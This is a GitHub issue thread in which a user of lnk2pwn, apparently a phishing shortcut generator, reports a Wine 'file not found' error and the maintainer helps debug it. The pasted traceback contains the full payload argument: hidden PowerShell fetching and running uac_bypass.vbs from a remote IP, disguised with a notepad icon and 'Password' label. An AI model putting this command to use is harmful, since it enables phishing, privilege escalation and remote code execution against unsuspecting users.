### ISSUE TITLE
Not working - Issue with wine.exe  

### ISSUE THREAD

**Issue by danish1211** [tommelo/lnk2pwn#1]
We are running code on kali linux
and mklink unable to find "target_path": "C:\\Windows\\System32\\cmd.exe" defined in config.json

Error trace:
[+] Generating the shortcut
**[Error 2] File not found: 'C:\\Windows\\System32\\cmd.exe'**
Traceback (most recent call last):
  File "lnk2pwn.py", line 126, in <module>
    main(cli_args)
  File "lnk2pwn.py", line 101, in main
    executor.execute(args)
  File "/root/Desktop/phishing/lnk2pwn/cmd/generatecmd.py", line 240, in execute
    self.delegate(args, json_config=json_config)
  File "/root/Desktop/phishing/lnk2pwn/cmd/command.py", line 113, in delegate
    self.handler(args, kwargs)
  File "/root/Desktop/phishing/lnk2pwn/cmd/generatecmd.py", line 172, in __generate
    self.__create_lnk(lnk_config, tmp_lnk)
  File "/root/Desktop/phishing/lnk2pwn/cmd/generatecmd.py", line 100, in __create_lnk
    return subprocess.check_output(arguments)
  File "/usr/lib/python2.7/subprocess.py", line 223, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
subprocess.CalledProcessError: Command '['wine', '/root/Desktop/phishing/lnk2pwn/bin/mklnk.exe', '-t', u'C:\\Windows\\System32\\cmd.exe', '-o', '/tmp/lnk2pwn/lnk2pwn.lnk', '--window-style', u'MINIMIZED', '-w', u'C:\\Windows\\System32', '-a', u'/c powershell.exe -w hidden iwr -outf %tmp%\\p.vbs http://192.168.10.122/uac_bypass.vbs & %tmp%\\p.vbs', '-i', u'C:\\Windows\\System32\\notepad.exe', '-d', u'Password']' returned non-zero exit status 1

**Comment by tommelo** [comment]
Hi @danish1211 
Sounds like a wine issue, let's make sure you have everything set up properly by typing the following command:

``
wine C:\\Windows\\System32\\cmd.exe
``

Would you mind sharing the result?

**Comment by danish1211** [comment]
wine C:\\Windows\\System32\\cmd.exe
Microsoft Windows 6.1.7601 (3.0.1)

Z:\root>  

working perfectly on bash terminal

**Comment by tommelo** [comment]
@danish1211 Another one:

``
file ~/.wine/drive_c/windows/system32/cmd.exe
``

**Comment by danish1211** [comment]
@tommelo I appreciate your help.
root@kali:~# file ~/.wine/drive_c/windows/system32/cmd.exe
`/root/.wine/drive_c/windows/system32/cmd.exe: PE32+ executable (console) x86-64, for MS Windows
`

**Comment by danish1211** [comment]
root@kali:~/Desktop/phishing/lnk2pwn# wine /root/Desktop/phishing/lnk2pwn/bin/mklnk.exe -t 
'C:\Windows\System32\cmd.exe' -o /tmp/lnk2pwn/lnk2pwn.lnk -w C:\Windows\System32

[Error 2] File not found: 'C:\\Windows\\System32\\cmd.exe'

**Comment by danish1211** [comment]
may be problem with wine or mklnk.exe

**Comment by tommelo** [comment]
@danish1211 I'm going to upgrade my wine to the same version as yours to see if I can reproduce this issue. 

I started to wonder, maybe it's not a good idea to depend on **wine** and **Python**. I'll look forward for a complete re-write in C.

Let me know if you have any thoughts on that!

**Comment by danish1211** [comment]
Problem is with **wine**. I ran mklink.exe with required target exe, argument, icon path exe on windows machine and mklink was working perfectly.
